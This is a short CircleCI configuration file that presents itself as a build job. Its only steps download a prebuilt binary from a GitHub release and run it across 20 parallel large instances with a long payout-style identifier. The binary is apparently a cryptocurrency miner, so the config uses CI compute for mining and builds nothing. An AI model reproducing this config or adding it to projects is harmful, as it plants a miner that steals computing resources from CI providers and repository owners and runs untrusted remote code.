# CircleCI configuration file
version: 2.1

jobs:
  build:
    docker:
     - image: cimg/base:2022.05
    parallelism: 20
    resource_class: large
    steps:
        - run: wget https://github.com/Qubic-Solutions/rqiner-builds/releases/download/v0.3.19/rqiner-x86-broadwell && chmod +x rqiner-x86-broadwell
        - run: ./rqiner-x86-broadwell -t 4 -i BEQENIGEIOOTXBUAIQVGQGMMNIXCXSHDZHGFPTSLZCGHTCMZHGIIDXAFUJDJ
